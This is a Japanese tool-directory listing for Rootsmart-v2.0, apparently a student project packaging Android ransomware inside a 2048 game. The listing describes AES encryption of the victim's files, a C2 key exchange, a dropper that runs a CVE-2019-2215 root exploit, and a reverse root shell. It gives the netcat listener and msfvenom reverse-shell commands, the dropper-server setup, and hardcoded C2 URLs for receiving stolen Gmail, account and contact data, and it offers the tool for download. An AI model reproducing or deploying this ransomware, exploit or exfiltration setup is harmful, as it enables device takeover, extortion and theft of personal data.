Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Rootsmart-v2.0 — Androidランサムウェア開発 - AES256暗号化 + CVE-2019-2215(リバースルートシェル)+ データ窃取 | Kitploit
ツール/GitHubGitHub/crackercat/rootsmart-v2.0
Androidセキュリティ暗号化/復号化ツール脆弱性分析エクスプロイトリバースエンジニアリングデータ流出ペネトレーションテストモバイルセキュリティコマンド&コントロール学習と教育ペイロード開発
274年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
crackercat/rootsmart-v2.0

Rootsmart-v2.0

Androidランサムウェア開発 - AES256暗号化 + CVE-2019-2215(リバースルートシェル)+ データ窃取

リポジトリを見る

Rootsmart 2.0 w/ cve-2019-2215 + Ransomware

免責事項

このプロジェクトは教育目的のみです。このプロジェクトは rkshrksh/2048-Game と kangtastic/cve-2019-2215 のコードを利用しています。


プロジェクト概要

このプロジェクトは、シンガポール工科大学(Singapore Institute of Technology)のモバイルセキュリティモジュールの一部です。プロジェクトは6週間で行われ、その目的は悪意のあるAndroidアプリケーションを開発することでした。これにより、Android OSにセキュリティメカニズムがどのように実装されているか、そしてOWASP Mobile Top 10:2017 M8 - Code Tampering をどのように活用できるかを学ぶことができました。

このプロジェクトは、AES暗号化を利用し、cve-2019-2215を兵器化し、感染したデバイスからデータを外部送信する、自作のランサムウェアを紹介するための概念実証(proof of concept)です。

Android 10 と Google Pixel 2 XL でテストされています。

root@kitploit:~
├── 2048-Game 					// Android Project Folder
├── 2048-keystore				// Test-Keystore
├── cve-2019-2215				// Modified cve-2019-2215
│	└── cve-2019-2215.c
├── dropper_server				// Dropper server directory 
│	├── cve-2019-2215			// shells.zip content before zipping
│	├── dropper_server.py		// Dropper server program
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// Netcat windows binary - for Reverse shell listener
│	├── requirements.txt
│	├── shells.zip  			// shells.zip that is hosted in root of dropper server
│	└── venv
└── test_images    				// test_images for easy adb push <image.ext> /sdcard/Pictures
攻撃ベクター:
  1. アプリケーションをインストールして実行し、権限を許可する
  2. ランサムウェアは /sdcard/Pictures 内のすべてのファイルをAES暗号化する
  3. 各ファイルはランダムに生成されたキーで暗号化される
  4. キーは /sdcard/keys.json に保存され、各 key:value ペアは filepath:key となる
  5. C2サーバーの /get_mk にHTTP GETリクエストを送信し、レスポンス本文からMasterKeyとVictimIDを取得する
  6. MasterKeyは keys.json を暗号化し、VictimIDは /sdcard/victimID.txt に保存される
  7. アプリケーションは shells.zip をダウンロードし、内容を解凍する
  8. 解凍された内容から cve-2019-2215 バイナリを実行する
  9. ルートシェルプロセスが生成され、解凍された内容から install.sh が実行される
  10. install.sh は解凍された内容から rs.elf を実行し、攻撃サーバーへのリバース接続を送信する
  11. アプリケーションはデバイスのgmail、ユーザーアカウント情報、連絡先を外部送信する。
デモ

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


C2(コマンド&コントロール)- セットアップ

このテストでは、被害者端末とC2サーバーが同じサブネットにあることを確認してください(それ以外の場合は、C2をパブリックインターネット上でホストしてください)。C2サーバーには、dropper/dropper_server.py にある3つのエンドポイントがあります。

  1. /process_command - GETリクエストで shells.zip をダウンロードし、cve-2019-2215 ルートエクスプロイトを実行する
  2. /get_mk - GETリクエストで victimID:masterkey の key-value ペアを取得し、/sdcard/keys.json を暗号化する
  3. /postData - 外部送信された gmail、連絡先、アカウント情報をPOSTする
リバースシェルサーバー
root@kitploit:~
nc -lvnp 1337 # Ideally this should be the same IP as the dropper server
ドロッパーサーバー
root@kitploit:~
# Generate rs.elf payload
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf

# Better to run flask on Windows if WSL don't port forward localhost traffic to Windows Host
cd dropper
python3 -m venv venv # Create venv

# Activate venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Make sure host shell is root/Administrator

# Run C2 server
python3 dropper_server.py # WSL
python dropper_server.py # Windows

shells.zip は /dropper 内

  1. dropper/cve-2019-2215 フォルダーに移動する
  2. rs.elf を作成した後、rs.elf + cve-2019-2215, install.sh をzipする
  3. zipファイルの名前を shells.zip に変更する
  4. shells.zip を /dropper に移動する

APKをコンパイルする前に以下を変更する

Javaクラス

root@kitploit:~
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/process_command"; // Line 19

// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45

// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Change IP and port according to dropper server IP and port
String urlString = "http://192.168.157.73:8080/postData"; // Line 32
ツールをダウンロード